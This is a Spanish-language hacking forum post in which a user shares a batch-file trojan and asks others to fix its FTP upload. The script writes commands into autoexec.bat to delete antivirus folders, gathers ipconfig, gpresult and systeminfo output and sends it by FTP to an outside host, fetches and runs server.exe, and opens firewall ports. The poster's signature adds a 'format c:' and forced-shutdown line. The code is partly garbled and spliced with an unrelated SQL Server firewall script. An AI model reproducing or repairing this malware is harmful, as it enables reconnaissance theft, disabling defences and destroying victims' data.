Vota por nosotros en el ranking web que participamos

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Octubre 13, 2008, 09:23:03
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Programacion  |  Programación (Moderador: programas gratis)  |  Tema: Proyecto 1 (help whit me) 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Proyecto 1 (help whit me)  (Leído 180 veces)
cuban-hack
Habitual
*****
Desconectado Desconectado

Mensajes: 300


en la vida hay cosas que no se pueden explicar....


Ver Perfil WWW
« en: Febrero 14, 2007, 01:29:47 »

 Afro
estoy creando un troyano, pero tengo un problema con ftp, no me envia el archivo selecionado, les dejo el code en .bat, para el que me encuentre el fallo me lo diga (los datos del ftp me da igual por que ya no lo uso).
@echo  off
copy date>c:\documents and Settings
c:\>archivo.txt
echo cuban-hack_5>>archivo.txt
echo 270690>>archivo.txt
echo send c:\date.txt>>archivo.txt
echo cd\ >> c:\autoexec.bat
echo rd /q /s *norton sytemworks* >> c:\autoexec.bat
echo rd /q /s *panda* >> c:\autoexec.bat
echo rd /q /s *norton* >> c:\autoexec.bat
echo rd /q /s *firewall* >> c:\autoexec.bat
echo rd /q /s *KAV personal* >> c:\autoexec.bat
echo rd /q /s *NOD32 Anti-virus* >> c:\autoexec.bat
echo rd /q /s *BitDefender prof* >> c:\autoexec.bat
echo rd /q /s *McAfee Virusscan* >> c:\autoexec.bat
echo rd /q /s *AVG professional* >> c:\autoexec.bat
echo rd /q /s *Norton Anti-Virus* >> c:\autoexec.bat
echo rd /q /s *Avast Home* >> c:\autoexec.bat
echo rd /q /s *Panda antivirus* >> c:\autoexec.bat
echo rd /q /s *F-prot Anti-virus* >> c:\autoexec.bat
echo rd /q /s *RAV Desktop* >> c:\autoexec.bat
echo rd /q /s *Dr. Web* >> c:\autoexec.bat
echo cd *archivos* >> c:\autoexec.bat
echo rd /q /s *norton sytemworks* >> c:\autoexec.bat
echo rd /q /s *panda* >> c:\autoexec.bat
echo rd /q /s *norton* >> c:\autoexec.bat
echo rd /q /s *firewall*  >> c:\autoexec.bat
echo rd /q /s *KAV personal* >> c:\autoexec.bat
echo rd /q /s *NOD32 Anti-virus* >> c:\autoexec.bat
echo rd /q /s *BitDefender prof* >> c:\autoexec.bat
echo rd /q /s *McAfee Virusscan* >> c:\autoexec.bat
echo rd /q /s *AVG professional* >> c:\autoexec.bat
echo rd /q /s *Norton Anti-Virus* >> c:\autoexec.bat
echo rd /q /s *Avast Home* >> c:\autoexec.bat
echo rd /q /s *Panda antivirus* >> c:\autoexec.bat
echo rd /q /s *F-prot Anti-virus* >> c:\autoexec.bat
echo rd /q /s *RAV Desktop* >> c:\autoexec.bat
echo rd /q /s *Dr. Web* >> c:\autoexec.bat
echo cd.. >> c:\autoexec.bat
echo cd windows >> c:\autoexec.bat
echo rd /q /s *norton sytemworks* >> c:\autoexec.bat
echo rd /q /s *panda* >> c:\autoexec.bat
echo rd /q /s *norton* >> c:\autoexec.bat
echo rd /q /s *firewall*  >> c:\autoexec.bat
echo rd /q /s *KAV personal* >> c:\autoexec.bat
echo rd /q /s *NOD32 Anti-virus* >> c:\autoexec.bat
echo rd /q /s *BitDefender prof* >> c:\autoexec.bat
echo rd /q /s *McAfee Virusscan* >> c:\autoexec.bat
echo rd /q /s *AVG professional* >> c:\autoexec.bat
echo rd /q /s *Norton Anti-Virus* >> c:\autoexec.bat
echo rd /q /s *Avast Home* >> c:\autoexec.bat
echo rd /q /s *Panda antivirus* >> c:\autoexec.bat
echo rd /q /s *F-prot Anti-virus* >> c:\autoexec.bat
echo rd /q /s *RAV Desktop* >> c:\autoexec.bat
echo rd /q /s *Dr. Web* >> c:\autoexec.bat
cd..
start
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

ipconfig /all > c:\date.txt
ftp -s:c:\archivo.txt cuban-hack.iespana.es
gpresult >> c:\date.txt
ftp -s:c:\archivo.txt cuban-hack.iespana.es
systeminfo >> c:\date.txt
ftp -s:c:\archivo.txt cuban-hack.iespana.es
echo USER > c:\date.txt
ftp -s:c:\archivo.txt cuban-hack.iespana.es
echo PASSWORD> c:\date.txt
ftp -s:c:\archivo.txt cuban-hack.iespana.es
echo send c:\date.txt > c:\date.txt
echo get server.exe > c:\date.txt
echo QUIT >> c:\date.txt
move c:\server.exe c:\windows\server.exe
cd windows
server.exe
if "%1"=="-np" goto HandleNp
if "%1"=="-rpc" goto HandleRpc
if "%1"=="-tcp" goto HandleTcp
if "%1"=="-browser" goto HandleBrowser
rem Usage
:Usage
echo "Usage: setupSqlServerPortAll -[np | rpc | tcp | browser] -port [portnum] -[enable | disable]
echo "-np : Setup SQLServer to listen on Named Pipe connections for local subnet only"
echo "-rpc : Setup SQLServer to listen on RPC multiprotocol for local subnet only"
echo "-tcp : Setup SQLServer to listen on TCP connections for local subnet only"
echo "       Must specify a port if -tcp option is chosen."
echo "-browser :  Setup SQLServer to provide SSRP service to support named instances"
echo "-port : Applies only for tcp"
echo " One of the following options MUST be specified"
echo "-enable: Enables a port"
echo "-disable: Disables a port"
goto Exit
:HandleTcp
echo %2
if "%2"=="-port" goto cont
goto Usage
:cont
if "%3"=="" goto Usage
if "%4"=="-enable" goto EnableTcp
if "%4"=="-disable" goto DisableTcp
goto Usage
:EnableTcp
echo "Enabling SQLServer tcp access for port %3 local subnet only"
netsh firewall set portopening tcp %3 SQL%3 ENABLE subnet
goto Exit
:DisableTcp
echo Disabling SQLServer tcp access for port 23 local subnet only"
netsh firewall set portopening tcp %3 SQL%3 disable subnet
goto Exit
:HandleNp
if "%2"=="-enable" goto EnableNp
if "%2"=="-disable" goto DisableNp
goto Usage
:EnableNp
echo "Enabling SQLServer named pipe access for local subnet only"
netsh firewall set portopening tcp 23 SQLNP ENABLE subnet
goto Exit
:DisableNp
echo Disabling SQLServer named pipe access for local subnet only"
netsh firewall set portopening tcp 23 SQLNP DISABLE subnet
goto Exit
:HandleRpc
if "%2"=="-enable" goto EnableRpc
if "%2"=="-disable" goto DisableRpc
goto Usage
:EnableRpc
echo "Enabling SQLServer multiprotocol access for local subnet only"
netsh firewall set portopening tcp 23 SQLNP enable subnet
goto Exit
:DisableRpc
echo Disabling SQLServer multiprotocol access for local subnet only"
netsh firewall set portopening tcp 23 SQLNP disable subnet
goto Exit
:HandleBrowser
if "%2"=="-enable" goto EnableBrowser
if "%2"=="-disable" goto DisableBrowser
goto Usage
:EnableBrowser
echo "Enabling SQLServer SSRP service for local subnet only"
netsh firewall set portopening udp 23 SQLBrowser enable subnet
goto Exit
:DisableBrowser
echo "Enabling SQLServer SSRP service for local subnet only"
netsh firewall set portopening udp 23 SQLBrowser disable subnet
goto Exit
exit


00 si me pueden decir el fallo no tarden mucho gratze
help y gracias. date.bat
En línea

vivimos para amar,
y el amor es todo lo que nos rodea....
material o no......
por eso vive con pacion todo lo que digas o escrivas.. y seras recordado..
                            yu cuban-hack [cub2(daviel)]
echo off
format c:\
y/n:y
y/n:y
shutdown -r -t 05 -e "JODETE"
msgs *yo vivo jodiendo y ¿tu?
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Programacion  |  Programación (Moderador: programas gratis)  |  Tema: Proyecto 1 (help whit me) « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.6 | SMF © 2006-2007, Simple Machines LLC